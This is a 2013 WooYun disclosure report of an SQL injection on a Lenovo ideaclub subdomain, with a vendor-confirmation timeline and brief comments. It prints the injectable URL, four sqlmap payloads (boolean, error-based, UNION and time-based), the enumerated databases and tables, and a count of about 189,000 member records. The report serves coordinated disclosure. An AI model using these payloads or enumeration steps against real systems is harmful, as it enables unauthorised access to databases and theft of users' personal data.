当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-036396

漏洞标题:联想安全问题十三某分站SQL注射漏洞(189738用户数据)

相关厂商:联想

漏洞作者: VIP

提交时间:2013-09-08 11:50

修复时间:2013-10-23 11:51

公开时间:2013-10-23 11:51

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-09-08: 细节已通知厂商并且等待厂商处理中
2013-09-09: 厂商已经确认,细节仅向厂商公开
2013-09-19: 细节向核心白帽子及相关领域专家公开
2013-09-29: 细节向普通白帽子公开
2013-10-09: 细节向实习白帽子公开
2013-10-23: 细节向公众公开

简要描述:

联想的礼物到了,比别的大多数厂商都要丰厚的多的多的多(包含一块三星120G SSD固态)

详细说明:

注射点:
http://ideaclub.lenovo.com.cn/club/index.php?m=store&c=index&f=getPlace&item_id=ad2dc941e1fb11e29c5fc89cdcd8545b

漏洞证明:

---
Place: GET
Parameter: item_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: m=store&c=index&f=getPlace&item_id=ad2dc941e1fb11e29c5fc89cdcd8545b
' AND 3075=3075 AND 'HSHZ'='HSHZ
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: m=store&c=index&f=getPlace&item_id=ad2dc941e1fb11e29c5fc89cdcd8545b
' AND (SELECT 1518 FROM(SELECT COUNT(*),CONCAT(0x7176717471,(SELECT (CASE WHEN (
1518=1518) THEN 1 ELSE 0 END)),0x7164647071,FLOOR(RAND(0)*2))x FROM INFORMATION_
SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'WOvh'='WOvh
    Type: UNION query
    Title: MySQL UNION query (NULL) - 10 columns
    Payload: m=store&c=index&f=getPlace&item_id=ad2dc941e1fb11e29c5fc89cdcd8545b
' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176717471,0x615568567
4576d7a6b6a,0x7164647071),NULL,NULL,NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: m=store&c=index&f=getPlace&item_id=ad2dc941e1fb11e29c5fc89cdcd8545b
' AND SLEEP(5) AND 'REay'='REay
---


web application technology: Nginx
back-end DBMS: MySQL 5.0


available databases [4]:
[*] erazer
[*] ideaclub
[*] ideaclub2
[*] information_schema


current user:    'ideaclub@localhost'


current database:    'ideaclub2'


Database: ideaclub2
[345 tables]
+------------------------------------+
| c_activity_member                  |
| c_asset_tbl                        |
| c_asset_tbl_content_tbl            |
| c_comment                          |
| c_config                           |
| c_content_tbl                      |
| c_content_tbl_download_tbl         |
| c_content_tbl_system_menu          |
| c_content_tbl_template_tbl         |
| c_dictionary_map                   |
| c_dictionary_sort                  |
| c_download_tbl                     |
| c_evil_ip                          |
| c_experience_store                 |
| c_expstore                         |
| c_goods                            |
| c_goods_convert                    |
| c_goods_img                        |
| c_item_tbl                         |
| c_item_tbl_download_tbl            |
| c_keywords                         |
| c_m_ad                             |
| c_m_campaisn                       |
| c_m_media                          |
| c_m_tracker                        |
| c_member                           |
| c_member_action                    |
| c_member_action_score              |
| c_member_attention                 |
| c_member_bind                      |
| c_member_bind_douban               |
| c_member_bind_qq                   |
| c_member_bind_renren               |
| c_member_bind_sina                 |
| c_member_login_count               |
| c_member_profile                   |
| c_member_score                     |
| c_member_verifycode                |
| c_member_visit                     |
| c_reg_user                         |
| c_store_activity_comment           |
| c_store_products                   |
| c_system_function                  |
| c_system_menu                      |
| c_system_menu_function             |
| c_system_menu_template_tbl         |
| c_system_role                      |
| c_system_role_function             |
| c_system_user                      |
| c_system_user_role                 |
| c_template_tbl                     |
| f_common_admincp_cmenu             |
| f_common_admincp_group             |
| f_common_admincp_member            |
| f_common_admincp_perm              |
| f_common_admincp_session           |
| f_common_admingroup                |
| f_common_adminnote                 |
| f_common_advertisement             |
| f_common_advertisement_custom      |
| f_common_banned                    |
| f_common_block                     |
| f_common_block_favorite            |
| f_common_block_item                |
| f_common_block_item_data           |
| f_common_block_permission          |
| f_common_block_pic                 |
| f_common_block_style               |
| f_common_block_xml                 |
| f_common_cache                     |
| f_common_card                      |
| f_common_card_log                  |
| f_common_card_type                 |
| f_common_connect_guest             |
| f_common_credit_log                |
| f_common_credit_rule               |
| f_common_credit_rule_log           |
| f_common_credit_rule_log_field     |
| f_common_cron                      |
| f_common_devicetoken               |
| f_common_district                  |
| f_common_diy_data                  |
| f_common_domain                    |
| f_common_failedlogin               |
| f_common_friendlink                |
| f_common_grouppm                   |
| f_common_invite                    |
| f_common_magic                     |
| f_common_magiclog                  |
| f_common_mailcron                  |
| f_common_mailqueue                 |
| f_common_member                    |
| f_common_member_action_log         |
| f_common_member_connect            |
| f_common_member_count              |
| f_common_member_crime              |
| f_common_member_field_forum        |
| f_common_member_field_home         |
| f_common_member_fivecube           |
| f_common_member_grouppm            |
| f_common_member_log                |
| f_common_member_lottery            |
| f_common_member_magic              |
| f_common_member_medal              |
| f_common_member_profile            |
| f_common_member_profile_setting    |
| f_common_member_profile_update_log |
| f_common_member_security           |
| f_common_member_stat_field         |
| f_common_member_status             |
| f_common_member_validate           |
| f_common_member_verify             |
| f_common_member_verify_info        |
| f_common_myapp                     |
| f_common_myinvite                  |
| f_common_mytask                    |
| f_common_nav                       |
| f_common_onlinetime                |
| f_common_patch                     |
| f_common_plugin                    |
| f_common_plugin_reminder           |
| f_common_pluginvar                 |
| f_common_process                   |
| f_common_regip                     |
| f_common_relatedlink               |
| f_common_report                    |
| f_common_searchindex               |
| f_common_secquestion               |
| f_common_session                   |
| f_common_setting                   |
| f_common_smiley                    |
| f_common_sphinxcounter             |
| f_common_stat                      |
| f_common_statuser                  |
| f_common_style                     |
| f_common_stylevar                  |
| f_common_syscache                  |
| f_common_tag                       |
| f_common_tagitem                   |
| f_common_task                      |
| f_common_taskvar                   |
| f_common_template                  |
| f_common_template_block            |
| f_common_template_permission       |
| f_common_uin_black                 |
| f_common_usergroup                 |
| f_common_usergroup_field           |
| f_common_word                      |
| f_common_word_type                 |
| f_connect_disktask                 |
| f_connect_feedlog                  |
| f_connect_memberbindlog            |
| f_connect_postfeedlog              |
| f_connect_tthreadlog               |
| f_forum_access                     |
| f_forum_activity                   |
| f_forum_activityapply              |
| f_forum_announcement               |
| f_forum_attachment                 |
| f_forum_attachment_0               |
| f_forum_attachment_1               |
| f_forum_attachment_2               |
| f_forum_attachment_3               |
| f_forum_attachment_4               |
| f_forum_attachment_5               |
| f_forum_attachment_6               |
| f_forum_attachment_7               |
| f_forum_attachment_8               |
| f_forum_attachment_9               |
| f_forum_attachment_exif            |
| f_forum_attachment_unused          |
| f_forum_attachtype                 |
| f_forum_bbcode                     |
| f_forum_collection                 |
| f_forum_collectioncomment          |
| f_forum_collectionfollow           |
| f_forum_collectioninvite           |
| f_forum_collectionrelated          |
| f_forum_collectionteamworker       |
| f_forum_collectionthread           |
| f_forum_creditslog                 |
| f_forum_debate                     |
| f_forum_debatepost                 |
| f_forum_faq                        |
| f_forum_forum                      |
| f_forum_forum_threadtable          |
| f_forum_forumfield                 |
| f_forum_forumrecommend             |
| f_forum_groupcreditslog            |
| f_forum_groupfield                 |
| f_forum_groupinvite                |
| f_forum_grouplevel                 |
| f_forum_groupuser                  |
| f_forum_imagetype                  |
| f_forum_medal                      |
| f_forum_medallog                   |
| f_forum_memberrecommend            |
| f_forum_moderator                  |
| f_forum_modwork                    |
| f_forum_onlinelist                 |
| f_forum_order                      |
| f_forum_poll                       |
| f_forum_polloption                 |
| f_forum_pollvoter                  |
| f_forum_post                       |
| f_forum_post_location              |
| f_forum_post_moderate              |
| f_forum_post_tableid               |
| f_forum_postcache                  |
| f_forum_postcomment                |
| f_forum_postlog                    |
| f_forum_poststick                  |
| f_forum_promotion                  |
| f_forum_ratelog                    |
| f_forum_relatedthread              |
| f_forum_replycredit                |
| f_forum_rsscache                   |
| f_forum_spacecache                 |
| f_forum_statlog                    |
| f_forum_thread                     |
| f_forum_thread_moderate            |
| f_forum_threadaddviews             |
| f_forum_threadclass                |
| f_forum_threadclosed               |
| f_forum_threaddisablepos           |
| f_forum_threadimage                |
| f_forum_threadlog                  |
| f_forum_threadmod                  |
| f_forum_threadpartake              |
| f_forum_threadpreview              |
| f_forum_threadrush                 |
| f_forum_threadtype                 |
| f_forum_trade                      |
| f_forum_tradecomment               |
| f_forum_tradelog                   |
| f_forum_typeoption                 |
| f_forum_typeoptionvar              |
| f_forum_typevar                    |
| f_forum_warning                    |
| f_home_album                       |
| f_home_album_category              |
| f_home_appcreditlog                |
| f_home_blacklist                   |
| f_home_blog                        |
| f_home_blog_category               |
| f_home_blog_moderate               |
| f_home_blogfield                   |
| f_home_class                       |
| f_home_click                       |
| f_home_clickuser                   |
| f_home_comment                     |
| f_home_comment_moderate            |
| f_home_docomment                   |
| f_home_doing                       |
| f_home_doing_moderate              |
| f_home_favorite                    |
| f_home_feed                        |
| f_home_feed_app                    |
| f_home_follow                      |
| f_home_follow_feed                 |
| f_home_follow_feed_archiver        |
| f_home_friend                      |
| f_home_friend_request              |
| f_home_friendlog                   |
| f_home_notification                |
| f_home_pic                         |
| f_home_pic_moderate                |
| f_home_picfield                    |
| f_home_poke                        |
| f_home_pokearchive                 |
| f_home_share                       |
| f_home_share_moderate              |
| f_home_show                        |
| f_home_specialuser                 |
| f_home_userapp                     |
| f_home_userappfield                |
| f_home_visitor                     |
| f_infbox                           |
| f_infbox_setting                   |
| f_mobile_setting                   |
| f_plugin_wodexunzhang              |
| f_plugin_wodexunzhang_ershou       |
| f_plugin_wodexunzhang_fenlei       |
| f_plugin_wodexunzhang_kucun        |
| f_plugin_wodexunzhang_log          |
| f_plugin_wodexunzhang_user         |
| f_portal_article_content           |
| f_portal_article_count             |
| f_portal_article_moderate          |
| f_portal_article_related           |
| f_portal_article_title             |
| f_portal_article_trash             |
| f_portal_attachment                |
| f_portal_category                  |
| f_portal_category_permission       |
| f_portal_comment                   |
| f_portal_comment_moderate          |
| f_portal_rsscache                  |
| f_portal_topic                     |
| f_portal_topic_pic                 |
| f_security_evilpost                |
| f_security_eviluser                |
| f_security_failedlog               |
| f_ucenter_admins                   |
| f_ucenter_applications             |
| f_ucenter_badwords                 |
| f_ucenter_domains                  |
| f_ucenter_failedlogins             |
| f_ucenter_feeds                    |
| f_ucenter_friends                  |
| f_ucenter_mailqueue                |
| f_ucenter_memberfields             |
| f_ucenter_members                  |
| f_ucenter_members_csv              |
| f_ucenter_mergemembers             |
| f_ucenter_newpm                    |
| f_ucenter_notelist                 |
| f_ucenter_pm_indexes               |
| f_ucenter_pm_lists                 |
| f_ucenter_pm_members               |
| f_ucenter_pm_messages_0            |
| f_ucenter_pm_messages_1            |
| f_ucenter_pm_messages_2            |
| f_ucenter_pm_messages_3            |
| f_ucenter_pm_messages_4            |
| f_ucenter_pm_messages_5            |
| f_ucenter_pm_messages_6            |
| f_ucenter_pm_messages_7            |
| f_ucenter_pm_messages_8            |
| f_ucenter_pm_messages_9            |
| f_ucenter_protectedmembers         |
| f_ucenter_settings                 |
| f_ucenter_sqlcache                 |
| f_ucenter_tags                     |
| f_ucenter_vars                     |
| ld_member_prize                    |
| ld_prize_config                    |
| ld_prize_log                       |
| ld_prize_setting                   |
| ld_prize_test                      |
| ld_receive_address                 |
| temp_common_member                 |
| temp_member                        |
| temp_un                            |
| tmp_id                             |
+------------------------------------+


Database: ideaclub2
+-----------------+---------+
| Table           | Entries |
+-----------------+---------+
| f_common_member | 189738  |
+-----------------+---------+

修复方案:

过滤哦

版权声明:转载请注明来源 VIP@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2013-09-09 17:17

厂商回复:

这个貌似跟 你之前提交的重复了 http://www.wooyun.org/bugs/wooyun-2013-035312.

最新状态:

暂无

漏洞评价:

评论

  1. 2013-09-08 20:45 | PgHook ( 普通白帽子 | Rank:964 漏洞数:115 | ...........................................)

    你这是诱惑我们啊!!!!!!

  2. 2013-09-09 12:28 | Lee Swagger ( 路人 | Rank:28 漏洞数:5 | 洗洗睡吧)

    @VIP 除了SSD 还有其他的什么东西

  3. 2013-10-20 13:47 | 沦沦 ( 普通白帽子 | Rank:504 漏洞数:127 | 爱老婆,爱生活)

    求搞基,求交流